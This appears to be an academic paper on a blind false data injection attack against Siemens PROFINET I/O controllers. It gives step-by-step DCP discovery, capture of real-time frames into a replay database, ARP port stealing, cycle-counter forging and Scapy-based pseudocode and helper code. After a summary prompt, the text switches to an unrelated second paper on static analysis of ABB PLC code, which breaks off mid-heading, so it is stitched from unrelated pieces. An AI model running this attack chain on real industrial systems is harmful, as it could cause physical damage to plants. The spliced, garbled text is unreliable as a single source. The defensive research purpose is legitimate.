Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, gas plants and others. In the past, security in ICSs was mostly achieved through isolation based on the control of physical access. Currently, however, Ethernet and the IP protocol stack are becoming the main part of any plant and factory network. As a consequence, thousands of ICS components, e.g. PLCs, are directly reachable from the internet [1], [2]. Although only one PLC may be reachable from outside, this exposed PLC is likely to be connected to internal networks, e.g. via PROFINET, with many more PLCs; this is what is called the deep industrial network. Attackers can therefore leverage an exposed PLC to extend their access from the internet into the deep industrial network. Another fact was pointed out in [3]: the report showed that many devices are exposed to the internet without any security in mind, that many ICS operators lack knowledge of how to secure their devices within their own operations, and that organizations may know but may not perceive the potential risk as costing more than the mitigation. We agree with these previous reports that many manufacturers are still not willing to secure their industries unless they are specifically told to do so, or will often perform security upgrades only if absolutely necessary, i.e. if something severe has occurred. Modern ICS components are increasingly connected over PROFINET I/O communication to exchange data between the controllers and other industrial devices.
This concept is based on the Ethernet standard given by IEEE 802.3 (Institute of Electrical and Electronics Engineers), and allows the connected stations to establish and maintain connectivity through three different channels: Real-Time (RT), Non-Real-Time (NRT), and Isochronous Real-Time (IRT). These channels coexist in an Application Relation (AR) between nodes and satisfy all the requirements for industrial automation. Although integrating PROFINET I/O with ICSs provides better network connectivity and a more streamlined control process, it also comes with its own security challenges. This is due to the fact that PROFINET I/O nodes do not have any endpoint security functionality, which exposes them to a variety of attacks such as man-in-the-middle (MITM), denial of service (DoS), replay attacks, false data injection (FDI), etc. once a malicious adversary gains access to a target device or its network. One of the well-known vulnerabilities that can compromise the communication integrity of PROFINET I/O systems is improper/fake sensor readings or actuator values exchanged between the connected stations, i.e. between IO-Controllers, IO-Devices and the IO-Supervisor. These threats are known as deception attacks [4] or false data injection (FDI) in the IT world, and occur when the physical values of a hardware device are manipulated by sending fake values or signals to the victim device. Such threats are very severe because programmable logic controllers (PLCs) rely keenly on reading accurate sensor measurements to safely control critical processes in real time, and any successful FDI attack might eventually cause significant damage to the infected system. In PROFINET I/O systems using real-time channels, the nodes normally exchange I/O process data through specific frames, namely PROFINET I/O Real Time (PNIO-RT) frames; see Figure 1. These frames have fixed structure features, e.g. packet size, packet type, frame identifier, data size, etc.
978-1-7281-9023-5/21/$31.00 ©2021 IEEE. 2021 IEEE 30th International Symposium on Industrial Electronics (ISIE) | DOI: 10.1109/ISIE45552.2021.9576496

The RT data field in each PNIO-RT frame contains the bytes that represent either sensor measurements or actuator values, depending on the transaction direction between the nodes: from IO-Controllers to IO-Devices for actuator values, and from IO-Devices to IO-Controllers for sensor measurements.

Fig. 1: Ethernet message structure

The approach we take in this paper is to manipulate these bytes by performing an FDI attack scenario without any prior knowledge of the target system, the data exchanged between stations, the physical process, or even the system parameters. To achieve this, we introduce a new attack approach based on integrating an I/O Database into the exploit scenario. This method is based on collecting network captures that contain actual sensor and output values from the target system (prior to launching our FDI attack), which allows the attacker to intercept, compare, and then replace the correct I/O process data with false data from the I/O database. This technique does not require the adversary to map the I/O data bytes to a readable version, as most of the previous works assumed, e.g. [16], which is, in our opinion, not practical since the attacker is not familiar with the system he aims to exploit. Our new approach is more realistic and easier to implement, as we use a simple Python script based on Scapy to filter, extract and store the PNIO-RT frames in the I/O Database. Our full attack chain consists of two main phases. Offline: sniffing and collecting data prior to our attack. Online: injecting and forwarding false data to the victims in real time.
This work is summarized as follows: we discover all PROFINET I/O-enabled devices in the network using our PN-IO DCP (Discovery and Configuration Protocol) scanner. Then we create an I/O database by collecting multiple network captures from the target system and processing each capture by extracting and grouping the PNIO-RT frames into input/output pairs. Afterwards, we compromise the trust connection between the PROFINET I/O stations by implementing a MITM attack based on port stealing. Finally, we inject false data into the network based on our I/O database; see Section IV. Please note that in this work we are only interested in compromising the deep network, i.e. gaining access to the ICS network from outside is out of the scope of this work and can be achieved via typical attack vectors in the IT world, such as an infected USB stick, a vulnerable web server, etc. Our full attack chain is implemented on a real industrial setting using an S7-300 PLC as IO-Controller and an S7 CP 343-1 Lean as IO-Device. The rest of the paper is organized as follows: we compare our work with related ones in Section II; Section III gives an overview of our experimental setup; our attack is illustrated in Section IV; we discuss the results of our new approach in Section V; and we finally conclude the paper in Section VI.

II. RELATED WORK

In recent years, many previous efforts [5]-[15] discussed that sensors on a fieldbus network send information to the PLC, where it is used as input to the control program, and showed that if the data is modified or inserted, the PLC consequently reads incorrect information and makes wrong decisions that affect the physical process. In a similar vein, output data could be manipulated or inserted between the PLC and the controlled device, causing a similar situation.
All the above works were done on fieldbus communications based on MODBUS and/or Ethernet protocols, assuming that the attacker is familiar beforehand with the target system and has prior knowledge of the system parameters. However, this strong assumption makes their attacks hard to implement in a practical real-world scenario. Opposed to their works, we present in this paper a real-time false data injection attack implemented on the PROFINET I/O fieldbus protocol that does not require the adversary to be familiar with either the physical process or the data packets exchanged between the stations. The port stealing approach is widely used in compromising PROFINET I/O systems. An earlier attempt to inject false data into PLCs through port stealing is presented in [17]. The authors showed that it is possible to attack and gain control over PROFINET I/O nodes; however, their approach was not implemented on real hardware. Another research group managed to exploit a vulnerability of the PROFINET Discovery and Basic Configuration Protocol (DCP) [18]. They performed denial of service (DoS) attacks through port stealing against the application relation (AR) between the IO-Controller and the IO-Device. Their attack aimed only at breaking the trust relation between PROFINET stations and was not designed to inject fake data after stealing the port, as ours does. The authors of [19] also described a false data injection attack via the port stealing technique on PROFINET IO-Controllers. They managed to set up an AR with the IO-Controller and send fake input data by crafting DCP identify responses. Their attack was detectable, could be exploited only in the setup process, and had no influence on the availability of the automation system during operation.
Our work differs in that, after implementing the port stealing attack, we replace the correct data with false data drawn from an I/O Database of data collected from previous network captures. This makes our method hard to detect, as we use the same data that the stations themselves exchanged. In [20], a paper presented a signature-based IDS for industrial control systems. As motivation for this IDS, an attack aiming to disturb a stepping motor with no knowledge of the industrial process was performed. The authors focused on replaying sniffed network packets to achieve a successful attack based on the port stealing technique. We believe that the attack scenario described in their paper is not feasible for a real setup, and the authors did not clearly describe how they managed to capture the packets between the motor and the PLC in order to replay the traffic. In 2021, a recently published paper [16] implemented a false data injection attack against a PROFINET I/O system. The authors showed that an attacker can sniff and manipulate the exchanged data after stealing the port from the IO-Controller. They assumed that the attacker has previous knowledge of the physical process and the control system and can therefore map the raw I/O data to the actual sensor readings. We believe that this assumption also makes their work impractical for a real scenario, as the attacker is not supposed to be familiar with the target system in advance.

III. EXPERIMENTAL SET-UP

Fig. 2: Experimental set-up

In this section, we describe the experimental set-up used to test the attack scenario presented in this paper. As shown in Figure 2, there are two aquariums filled with water that is pumped from one to the other until a certain level is reached, and then the pumping direction is inverted.
The entire system is controlled by a PLC (S7-315 2 PN/DP) which is connected to a remote I/O module using the PROFINET I/O standard, exchanging data (sensor and actuator values) cyclically over the network via the industrial Ethernet communication processor IE-CP. (Note that we use these industrial settings also in experiments run in our earlier publications [23], [24], [25].) The physical process is monitored by the TIA Portal software installed on the engineering station, which here is a normal PC. In our example application we have three stations. In the first station, an S7 315-2 PN/DP CPU is set as IO-Controller. The second station is the IO-Device; it consists of an S7 315 DP CPU and a communication processor CP 343-1 Lean. This station is connected directly to an external I/O module which is attached to the input and output hardware, i.e. the two pumps and the four digital sensors shown in Figure 2. Both stations exchange input and output data cyclically in real time using the PROFINET I/O protocol. The third station is the IO-Supervisor, which represents the engineering station in this example. All three stations are connected to a 100 Mbit/s industrial switch.

IV. ATTACK DESCRIPTION

Figure 3 shows an overview of the attack scenarios we perform to inject false data into the network traffic exchanged between the PROFINET I/O nodes. To achieve a fully blind FDI attack scenario, we first need to discover the network topology of the target PROFINET I/O system, and then collect PNIO-RT packets from the traffic to create our I/O database containing actual sensor and actuator values. These two steps are done prior to our injection attack.
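The topology-discovery step just mentioned rests on a DCP Identify request sent to the PROFINET multicast address. The sketch below hand-builds such a frame from the DCP field layout (EtherType 0x8892, FrameID 0xFEFE, ServiceID 5 for Identify, option/suboption All); the scanner used in this paper is Scapy-based, so this struct-level builder is our own illustration:

```python
import struct

# Hedged sketch of a DCP "Identify All" request frame. Field layout
# follows the PROFINET DCP specification (EtherType 0x8892, FrameID
# 0xFEFE, ServiceID 5 = Identify); the source MAC is illustrative.
PN_MULTICAST = bytes.fromhex("010ecf000000")  # PROFINET multicast MAC
SRC_MAC = bytes.fromhex("020000000001")       # locally administered, illustrative

def build_dcp_identify_all(xid=0x01020304, response_delay=0x0080):
    frame_id = struct.pack(">H", 0xFEFE)        # DCP Identify request
    block = struct.pack(">BBH", 0xFF, 0xFF, 0)  # option All / suboption All
    # DCP header: ServiceID, ServiceType (0 = request), Xid, delay, length
    dcp = struct.pack(">BBIHH", 5, 0, xid, response_delay, len(block)) + block
    eth = PN_MULTICAST + SRC_MAC + struct.pack(">H", 0x8892)
    return eth + frame_id + dcp

frame = build_dcp_identify_all()
print(len(frame), frame[12:14].hex())  # 30 8892
```

On the wire, the frame would still need padding to the 60-byte Ethernet minimum and a raw socket (or Scapy's sendp) to transmit; this sketch only builds the bytes, and every answering device identifies itself with the parameters listed later in Table I.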
3: High-level overview of our false data injection attack: scenario 1 manipulating senor data upper part of the gure; scenario 2 manipulating control commands lower part of the gure collecting the needed data from the target, we start our main attack by stealing the port from the nodes and send false data packets to the victim devices using our I/O database created earlier. In the following we illustrate the two phases of our full attack-chain in detail. A. Pre-Attack Phase (Of ine) Here, the attacker aims to get an overview of the network and the devices roles that are connected in the target system as a rst step, and then to sniff and to collect data packets that the stations exchange cyclically over the PROFINET I/O frames. 1) Discovering the Network Topology: For obtaining all the required information about the target system for our attack, we use a PN-IO DCP scanner introduced in our paper [23]. Our scanner is a python script based on Scapy, and sends a DCP identify request via multicast to the network. Each connected device returns its identifying parameters. Table 1 shows information gathered about all PROFINET-enabled devices such as names, MAC addresses, IP addresses, vendors, etc. For our example, our scanner managed to nd two devices available. The rst node is an IO-Controller located at the IP address 192.168.0.1 using the MAC address 00:1b:1b:23:fb:fe, whereas the second one is an IO-Device located at the IP address 192.168.0.2 using the MAC address 20:87:56:05:06:15 to connect with the other station. 2) Snif ng and Collecting Data: After discovering and determining the role of each device in our PROFINET I/O system, the next step is to collect sensor and actuator values. To create an I/O Database, we rst sniff and record the entire network stream between the stations using a snif ng network software e.g. Wireshark. The nodes exchange I/O process data through PNIO-RT frames, precisely class 1 (RTC1) frames see gure 4. 
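Based on the frame layout described here and the byte positions reported later in the paper (I/O data in bytes 17-56 of a 60-byte frame, followed by a 2-byte cycle counter and a data-status byte), a minimal RTC1 parser can be sketched as follows; the offsets are our reading of the paper, not a verified implementation of the spec:

```python
import struct

# Offsets below follow our reading of the paper's 60-byte RTC1 frames
# (figure 4): ethertype 0x8892, FrameID in the 0x80xx range, I/O data
# in bytes 17-56 (1-based), then cycle counter and data status.
def parse_rtc1(frame):
    """Return the interesting fields of a PNIO-RT class-1 (RTC1) frame,
    or None if the frame is not RTC1. A sketch, not a full parser."""
    ethertype, = struct.unpack_from(">H", frame, 12)
    frame_id, = struct.unpack_from(">H", frame, 14)
    if ethertype != 0x8892 or not 0x8000 <= frame_id <= 0x80FF:
        return None
    return {
        "frame_id": frame_id,
        "io_data": frame[16:56],                         # 40 bytes of I/O data
        "cycle_counter": struct.unpack_from(">H", frame, 56)[0],
        "data_status": frame[58],
    }
```

Filtering a capture then reduces to keeping the frames for which this parser returns a value, grouped by source and destination MAC address.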
These frames share the same structural features, which makes them easy to recognize and extract from ongoing network traffic.

TABLE I: Output of executing our PN-IO DCP scanner
Parameter     | Device 1          | Device 2
MAC Address   | 00:1b:1b:23:fb:fe | 20:87:56:05:06:15
Device ID     | 257               | 515
Device Role   | IO-Controller     | IO-Device
Device Vendor | S7-300            | S7-300 CP
IP Address    | 192.168.0.1       | 192.168.0.2
Network Mask  | 255.255.255.0     | 255.255.255.0
Vendor ID     | 42                | 42

Fig. 4: PROFINET I/O Real Time frame structure

As shown in figure 5, to collect a sufficient number of sensor measurements and actuator values, the sniffing process should last for a reasonably long period of time; in this work, we sniff the network for approximately 30 minutes. The captured stream is then filtered to retrieve only the PNIO-RT frames, using the unique packet type (0x8892) and frame ID (0x80xx) bytecodes. Using our prior knowledge of the device roles (from the previous step), we check the source and destination MAC addresses of each PNIO-RT frame and group the captured frames into a pair of Pcap files (sensor data and control command files) accordingly.

Fig. 5: Scheme of creating I/O Database

To quicken the comparison process during our injection, we need to remove the duplicate packets received during the sniffing period, i.e., those containing identical I/O data, from each Pcap file, keeping only the packets that differ from each other in the I/O process data bytes. This is done by comparing the I/O data bytes of each PNIO-RT frame to those of the other frames using byte comparison tools (Burp Suite Comparator2). Please note that the location of the I/O data bytes is always static in PNIO-RT frames of the same size, e.g.
for our example application, the nodes exchange PNIO-RT frames of a size of 60 bytes, and the I/O data bytes are located between byte number 17 and 56, as shown in figure 4. For the example application given in section III, we managed to create an I/O database containing 7 sensor reading frames as inputs and 2 actuator value frames as outputs. It is worth mentioning that pairing the captured frames in our I/O database into input and output Pcap files helps the attacker to compare and replace the I/O data bytes with false ones online, and to win the strict race condition that PROFINET I/O nodes must meet (as illustrated in the next subsection) before he replays his forged PNIO-RT packets to the network.

B. Attack Phase (Online)
In this phase, false data is injected into the network traffic based on our I/O database approach.

1) Port Stealing Approach: Before pushing incorrect data into the network, we first need to interrupt the Application Relation (AR) between the IO-Controller and the IO-Device. Technically, a typical industrial Ethernet switch controls and manages the binding of each MAC address to a certain switch port in an Address Resolution Protocol (ARP) mapping table.

2 https://portswigger.net/burp

Once the MAC address at any port changes because a new device has been added to the network, the switch updates its mapping table and the old entry is removed. Therefore, we just need to flood the switch with forged gratuitous ARP packets registering the attacker's MAC address in place of the victim host to achieve a successful port stealing, as shown in figure 6.

Fig. 6: Data exchange configuration after ARP poisoning attack: Scenario 1, stealing the port from the IO-Controller; Scenario 2, stealing the port from the IO-Device

This technique is widely used in MITM attacks in
traditional IT switched networks, where the switch assumes that the victim device is now using another switch port and forwards the packets to the new port. It is worth mentioning that this attack has a challenge: the frequency of sending ARP packets to the victim must be sufficient. If the target device sends ARP packets before the attacker, the switch keeps updating the binding of the port back to the victim's MAC address. To overcome this issue, the attacker must send ARP packets at a much higher frequency than the victim does. In our work, an interval of 1 ms was sufficient to prevent the switch from updating its mapping table. Once the packets of both devices are redirected to the attacker through port stealing, the attacker only needs to forward the packets accordingly to achieve a full MITM attack.

2) Injecting and Forwarding False Data: The final step is to replace the I/O data exchanged between the stations with the false data contained in one of the already recorded frames. This is done using our I/O database approach explained in section IV.A.2. Algorithm 1 gives the main core of our attack script used to inject false data. The algorithm is realized as a Python script, and the third-party library used here is Scapy. As can be seen from Algorithm 1, after interrupting the AR between the stations in the previous step, the attacker listens and receives a PNIO-RT frame in the very next PROFINET update cycle. The I/O data field of the received frame is then compared to the data fields of the already recorded frames in our I/O database, taking into account only frames recorded for the same communication direction. This comparison aims at finding a frame whose I/O data bytes differ from the captured one, and is repeated starting from the first frame in the database.
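This database lookup — take the frame just sniffed, scan the recorded frames for the same direction, and stop at the first one whose I/O data differs — can be sketched as follows (byte positions as we read them from the paper):

```python
# Byte positions assumed from the paper's 60-byte PNIO-RT frames:
IO_DATA = slice(16, 56)   # I/O data, bytes 17-56 in 1-based counting

def pick_false_frame(received, recorded):
    """Return the first recorded frame (same communication direction)
    whose I/O data differs from the frame just captured, or None if
    the database offers no alternative."""
    for candidate in recorded:
        if candidate[IO_DATA] != received[IO_DATA]:
            return candidate
    return None
```

The chosen frame's I/O data bytes are then spliced into the forged packet.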
Once a frame is found, its I/O data field is used as the new I/O data field in our forged PNIO-RT packet, and the port stealing attack is then stopped. Finally, the malicious packet containing the false I/O data is forwarded to its final destination. Please note that forwarding the crafted packet back to the network has two challenges. First, the malicious packet cannot be forwarded directly, because each PNIO-RT frame has a cycle counter (see figure 4). The 2-byte cycle counter value is always read, and the allowed number of missing packets between consecutive cycles is configured inside the TIA Portal software. To overcome this security mechanism, the forged packet should always carry the cycle counter value of the next PNIO-RT packet expected at the final destination. This is easy to solve, as the cycle counter values always differ by a constant number; e.g., in our system the cycle counter always increases by 256 per cycle. The second challenge is that, after stopping the port stealing, the attacker must win the race condition by sending the malicious PNIO-RT frame to the victim before the correct data is sent from the original source. In PROFINET I/O systems, the transmission interval (PROFINET update time cycle) is divided into four phases, named Send Clock, as shown in figure 7.
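The two constraints just described — a plausible cycle counter and a reply inside one update time — come down to simple arithmetic. In the sketch below, the +256 step and the Send Clock × Reduction Ratio relation are taken from the paper; the 16-bit wraparound is our assumption based on the 2-byte field:

```python
def next_cycle_counter(current, step=256):
    # The cycle counter is a 2-byte field; in the paper's system it
    # advances by 256 per update cycle, so the forged frame carries
    # the next expected value (wrapping at 16 bits, our assumption).
    return (current + step) & 0xFFFF

def update_time_ms(send_clock_ms, reduction_ratio):
    # PROFINET update time = Send Clock x Reduction Ratio; the forged
    # frame must reach the victim within one update time to win the race.
    return send_clock_ms * reduction_ratio
```

With the paper's example values (Send Clock 128 ms, Reduction Ratio 4), the attacker's window is roughly half a second.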
This parameter represents the frequency of exchanging data between the IO-Device and the IO-Controller. In fact, the PROFINET update time cycle results from the Send Clock multiplied by the Reduction Ratio. Therefore, a Send Clock of 1 ms and a Reduction Ratio of 4 means that I/O data is sent every 4 ms. However, the Send Clock is normally set between 2 and 512 milliseconds and differs from one system to another based on its requirements. For most industrial PROFINET I/O systems, the Send Clock is set to 128 milliseconds to avoid extreme network traffic overloads, meaning that each PROFINET node gets updated every 0.5 second. Assuming that the Send Clock in our example application is set to 128 milliseconds, the attacker needs to send his false data in less than 0.5 second to avoid the target PROFINET node being updated with correct I/O data.

Algorithm 1 FDI Attack based on I/O Database using Scapy
Function Inject(iface=eno1, SrcPort)
 1: packet = sniff(iface=eno1, timeout=cfg_sniff_time)
 2: save_Pcap(packet, filter=0x8892, Frame_id=0x8000, sniff.Pcap)
 3: for pkt in rdpcap(sniff.Pcap) do
 4:   src_mac = pkt[1:6], dest_mac = pkt[7:12], data = pkt[17:56], coun_cyc = pkt[57:58], data_status = pkt[59]
 5:   if (src_mac != plc_src_mac) then
 6:     for p in rdPcap(inputs_Pcapfile) do
 7:       if (data != load_packet(p[17:56])) then
 8:         fgd_data = load_packet(p[17:56]); break
 9:       end if
10:       p = p + 1
11:     end for
12:   else
13:     for p in rdPcap(outputs_Pcapfile) do
14:       if (data != load_packet(p[17:56])) then
15:         fgd_data = load_packet(p[17:56]); break
16:       end if
17:       p = p + 1
18:     end for
19:   end if
20:   if data != fgd_data then
21:     break
22:   end if
23:   pkt = pkt + 1
24: end for
25: fgd_pkt = padd_pkt(raw(PNIORealTime(CycleCounter=coun_cyc + 256, fgd_data, data_status, len=60)))
26: stop_port_stealing()
27: while time_slot() do
28:   sendp(fgd_pkt, iface=eno1)
29: end while
END Function

V.
RESULTS AND DISCUSSION
In this work, we test our false data injection attack approach in the following two scenarios:

- False Sensor Data: figure 8 describes this scenario. First, the port is stolen from the PLC; as a consequence, the PLC stops receiving any real-time data from the IE-CP and the data is redirected to the attacker. The packet received on the attacker machine is then compared, and the I/O data bytes are replaced with false ones based on our I/O database. The cycle counter value is read and increased by 256 to match the expected counter value of the next PNIO-RT frame, before the port stealing attack is stopped. Finally, our forged packet is sent at the next PROFINET update cycle, taking into account the race condition, i.e., in less than 0.5 second.

Fig. 7: PROFINET update time cycle
Fig. 8: False Data Injection against IO-Controller

- False Actuator Value: figure 9 shows this scenario. We aim at manipulating the control command sent from the PLC to the IE-CP. Here, too, the port is first stolen from the IO-Device, and as a result the real-time data is redirected to the attacker machine. The data bytes of the PNIO-RT packet received from the PLC are then compared to the ones in our I/O database and replaced with false data bytes in the forged packet. The cycle counter value is increased by 256, and the malicious packet is then sent back to the IO-Device after the port stealing is removed.

Fig. 9: False Data Injection against IO-Device

As a consequence of executing our injection attack-chain against the example application given in section III, we successfully tricked the PLC into reading false sensor measurements (in the first scenario) and the IE-CP into receiving false actuator values (in the second scenario). In both scenarios, our attack approach leads the tested PROFINET I/O system to operate the physical process incorrectly, depending on the false data frames chosen from our I/O database, keeping the infected system running at a certain operational state as long as the injection attack lasts; e.g., the water exceeds the limits and causes an overflow due to false sensor readings or actuator values. However, to increase the success probability of such an attack, the PLC/CP should continually receive our crafted data rather than the original data; therefore, the attacker needs to send each false data frame for more than one update cycle, as seen in figures 8 and 9. Furthermore, if the attacker keeps the port stealing attack running for a long duration, it disturbs the AR communication between the PLC and the CP, and our attack becomes a Denial-of-Service (DoS) rather than a false data injection (FDI).

VI. CONCLUSION AND FUTURE WORK
In this paper, we presented a fully blind false data injection attack against a PROFINET I/O system based on our new I/O database approach. For a practical implementation, we performed our full attack-chain in two scenarios on real hardware used in industrial settings. We found that both target PROFINET I/O nodes in our testbed were tricked, i.e., the IO-Controller into reading false sensor readings in the first scenario, and the IO-Device into executing false control commands in the second scenario. As a result, the physical process controlled by the infected devices runs incorrectly, and the system remained operating at a certain state as long as the attacker kept sending false data, depending on the data packet chosen from our I/O database. To mitigate the effect of such attacks, we highly recommend improving the isolation from other networks [21], combined with standard security practices [22]. Furthermore, the detection mechanism introduced in [20] might also be used to prevent our attack scenarios. Their open-source intrusion detection framework is designed based on port stealing and PN-IO detectors. In the meantime, the authors have developed a so-called preprocessor for Snort to react to PN-IO Ethernet frames, which reveals any forged frame sent by an unauthorized user. However, in our opinion, the best way to make an industrial network more resistant to FDI attacks is to have different prevention mechanisms in place, e.g., a demilitarized zone (DMZ) and network segmentation to improve attack prevention, and a layered defense-in-depth strategy to further improve the detection of successful malicious injections. The exploit in this paper is efficient, but for future work we will investigate the ability to perform false data injection attacks against modern S7 CPUs such as S7-1200 and S7-1500 PLCs. We are aware of the fact that attacking PROFINET systems based on modern PLCs is more challenging, as Siemens claims to provide its new devices with improved security means.
Summary:
This paper presents a fully blind false data injection (FDI) attack against an industrial field bus, i.e., PROFINET, which is widely used in Siemens distributed Input/Output (I/O) systems. In contrast to existing academic efforts, which assume that an attacker is already familiar with the target system and has full knowledge of what is transferred from the sensors or to the actuators in the remote I/O module, our attack overcomes these strong assumptions. For a realistic scenario, we first sniff and capture the real-time data packets (PNIO-RT) exchanged between the IO-Controller and the IO-Device. Based on the collected data, we create an I/O database that is utilized to replace the correct data with false data automatically and online. Our full attack-chain is implemented on a real industrial setting based on Siemens devices and tested in two scenarios. In the first, we manipulate the data representing the actual sensor readings sent from the IO-Device to the IO-Controller, whereas in the second scenario we manipulate the data representing the actuator values sent from the IO-Controller to the IO-Device. Our results show that compromising PROFINET I/O systems is feasible in both tested scenarios, and the physical process being controlled is affected. Finally, we suggest possible mitigation solutions to secure systems against such threats.
Summarize:
I. Introduction
In industry, automation and control tasks are frequently operated using programmable logic controllers (PLCs). This paper describes the experience of the authors while adapting the Arcade.PLC (Aachen Rigorous Code Analysis and Debugging Environment for PLCs) framework, as described by Biallas et al. in [1], for use with the ABB Compact Control Builder control application development environment. The goal of this project was to apply static analysis techniques to programming languages of the IEC 61131-3 standard [2] used in ABB Compact Control Builder in order to improve the development process of control applications. Software development environments for IEC 61131-3 languages often lack any support for static code analysis, except for error messages during compilation. There are some commercial tools available for checking syntactic properties of control applications or individual modules. However, these tools only check very basic properties (e. g., coding guidelines) [3] and are not integrated into the development environment. While the latter is often intended, e. g., to avoid recertification of safety-related software tools, the very basic nature of existing tools might also be rooted in a lack of awareness about the capabilities of formal methods in the automation domain. Improving this awareness was part of the motivation for the work described in the following.

II. ABB Compact Control Builder and Arcade.PLC
ABB Compact Control Builder is an ABB tool to develop control applications for AC 800M automation controllers. This family of control devices is used for the automation of complex industrial processes, e. g., in the chemical industry. While the core languages used in Compact Control Builder are a subset of the languages defined in IEC 61131-3, there are certain extensions to the standard. This includes instantiation rules, e.
g., singleton function blocks, and means to specify the order in which function blocks in an aggregated type are executed. One distinguishing factor of the AC 800M controller, and thus the respective Control Builder tools, is the use of native code execution. This means that all control programs are compiled from source code into binary machine code before deploying them to the controller. This includes all function block types and other modules provided as reusable libraries, except for certain firmware functions. The latter are part of the runtime environment of the controller. However, Compact Control Builder libraries are not distributed in compiled form, but as source code. To avoid modifications and inappropriate use of library components by control engineers developing a control application, the source code files are encrypted. Depending on the level of protection, this encryption can cover only the internal code or the complete interface of the components. In both cases, Compact Control Builder decrypts the libraries to perform the compilation from source code into native code. Arcade.PLC is a framework for the analysis and verification of programs for PLCs. Unmodified PLC programs in the languages Instruction List, Function Block Diagram, and Structured Text can be supplied by the user of the tool. Then, one function, function block, or program can be selected for model checking or static analysis. Arcade.PLC allows for specifying the intended functionality of function blocks or control programs using different logics as specification language. The integrated model checker can then prove or refute that a program conforms to the given specification. The other key aspect of Arcade.PLC is static analysis using abstract interpretation [4], which is the main focus of this paper. Figure 1 depicts the static analysis process of Arcade.PLC. Each program is first translated into an intermediate representation (IR).
This IR only contains simple instructions (assignments, jumps, conditional jumps, calls). It normalizes different PLC languages and simplifies further analyses. Then, a control flow graph (CFG) is built from the IR. This CFG is then analyzed with a flow-sensitive, partly context-sensitive abstract interpretation framework that annotates each node of the CFG with abstract values for the relevant variables. This information is processed by the check engine, which executes a set of predefined checks. If a violation is detected, the IR is mapped back to the original source code position and the warning is presented to the user.

2014 IEEE Emerging Technology and Factory Automation (ETFA), 978-1-4799-4845-1/14/$31.00 © 2014 IEEE

Fig. 1. The static analysis process of Arcade.PLC [5]

III. Non-Technical Challenges
A. Understanding the Domain
Understanding the domain of industrial automation is a key challenge for deploying static analysis techniques in this context. One very important aspect is that the development practices for control applications differ from those used in companies dealing only in software. The different approach to software development in the automation domain prohibits applying existing off-the-shelf solutions for general purpose programming languages. One very obvious reason for this is the use of domain-specific programming languages, e. g., those defined in IEC 61131-3, but the differences go beyond that. In most cases, control programs aim to mimic the real world and the components they are interacting with. This leads to a software development process which is based on frequent reuse of standard components to control certain parts of the system. When a program is written for a concrete system, these components are just instantiated, configured, and connected in an appropriate way.
As the developer of an application might not know all internal details of the instantiated components, there is a large potential for programming errors. On the other hand, the relative simplicity of the IEC 61131-3 languages makes them attractive for analysis. The troublesome features of other programming languages, e. g., pointers, references, and dynamic memory allocation, are not present in these languages. Admittedly, when looking at real-world code, this claim is softened, as there are extensions which introduce these features. Overall, the semantics of the languages used in control applications is straightforward, and thus they are easy to analyze.

B. Expectations vs. Reality
While most development environments for control applications claim to follow the IEC 61131-3 standard [2], in practice each vendor modifies and extends the programming languages defined in the standard. This also applies to ABB Compact Control Builder. One very obvious deviation from the IEC 61131-3 standard is that the interface and the internal variables of a function block are not defined in the source code itself, but using specialized tables which are part of the development environment. Thus, this information has to be extracted from proprietary XML files. It can also be accessed using a special interface based on .NET technology. As Arcade.PLC is based on Java, we chose not to use this interface and instead work on the XML files directly. We encountered one intricate extension which makes Compact Control Builder programs syntactically incompatible with the existing Structured Text parser in Arcade.PLC: for a certain type of variable, it is possible to append the suffix :status to scan their internal state. As the operator : can usually only occur within switch-statements, the existing parser reported the use of this feature as an error.
One important lesson we learned is that, in the end, real-world code is the best way to learn how software developers in a certain domain write code. Therefore, it is also the best way to identify the common use of programming languages as well as corner cases, which usually come with little documentation. Extensions like the previously described examples exist in many other development tools used in the automation domain as well.

C. Access to Real-World Code
The automation domain, in particular in the form of Compact Control Builder, comes with additional pitfalls when accessing source code for analysis. These pitfalls have organizational and historical reasons. While all function block libraries are distributed as source code, the libraries are protected by encryption to avoid modification of the source code by the users of a library. This protection was introduced since modification by control engineers led to problems when different versions of a library were used for control applications which were relying on unofficial patches. Essentially, the fact that this encryption feature is necessary highlights that there is a lot of potential for improvement in the development process of control software. The missing information in encrypted libraries directly translates into a technical challenge: since libraries can be completely encrypted, even the signatures of the function blocks in some libraries are not available to an external tool. Thus, the static analysis engine must derive an appropriate signature for types from encrypted libraries based on the way they are used in the unencrypted parts of the source code. During the adaptation of Arcade.PLC for ABB Compact Control Builder, it was often not clear whether warnings were triggered by flaws in the analysis or by missing information. This in turn led to a large amount of manual inspection of the source code.
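The usage-based signature derivation mentioned above could be approximated along the following lines; this is a heuristic sketch of our own, not Arcade.PLC's actual mechanism. Members of an instance that are assigned to are classified as inputs, members that are only read as outputs:

```python
import re

def infer_signature(source, instance):
    """Heuristically guess a function block interface from usage in
    Structured Text: members written (x.in := ...) count as inputs,
    members read without assignment count as outputs. Illustration only."""
    writes = set(re.findall(rf"{instance}\.(\w+)\s*:=", source))
    reads = set(re.findall(rf"[^.\w]{instance}\.(\w+)\b(?!\s*:=)", source))
    return {"inputs": sorted(writes), "outputs": sorted(reads - writes)}
```

For example, given `fb.input1 := 1; fb(); r := fb.output;`, the sketch would classify `input1` as an input and `output` as an output of the (hypothetical) instance `fb`.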
This issue could have been resolved by using unencrypted versions of the respective libraries, but this was not possible for all of them in the course of the project.

IV. Technical Challenges
A. Hidden Complexity
At first glance, many control applications seem like a straightforward composition of relatively simple program organizational units (POUs) with a dedicated functionality. However, since a control program can consist of many hundreds of POUs, the total number of lines of code in a program easily reaches tens of thousands. Furthermore, function block instances have their own internal variables and can interact through global variables. Thus, the state space to be handled by a static analysis tool can be very large. This complexity prohibits the use of simplistic analysis techniques for real-world applications. Additionally, the way function block calls are handled introduces even more variables: there are basically two ways to call a function block in most PLC languages. In the first version, input and output parameters are passed directly (either with formal parameter names or as values only). Another, semantically equivalent way to call a function block is to access the input and output parameters outside the call, such as:

functionblock.input1 := 1;
functionblock.input2 := a;
functionblock();
result := functionblock.output;

When implementing a static analysis which considers the data flow between function blocks, the above syntax entails that the input and output variables of every function block instance are accessible from its parent function block. For programs of realistic size, this makes the potential state space to be covered by an accurate static analysis very large.
To reduce the number of variables which have to be tracked, we use a pre-analysis to determine which variables of a function block are actually accessed in the remainder of the program [5], and only consider these variables during the analysis. This technique enables the analysis of complex programs in Arcade.PLC while still providing very accurate results, e. g., with respect to the possible value ranges of variables.

B. Identifying Useful Analyses
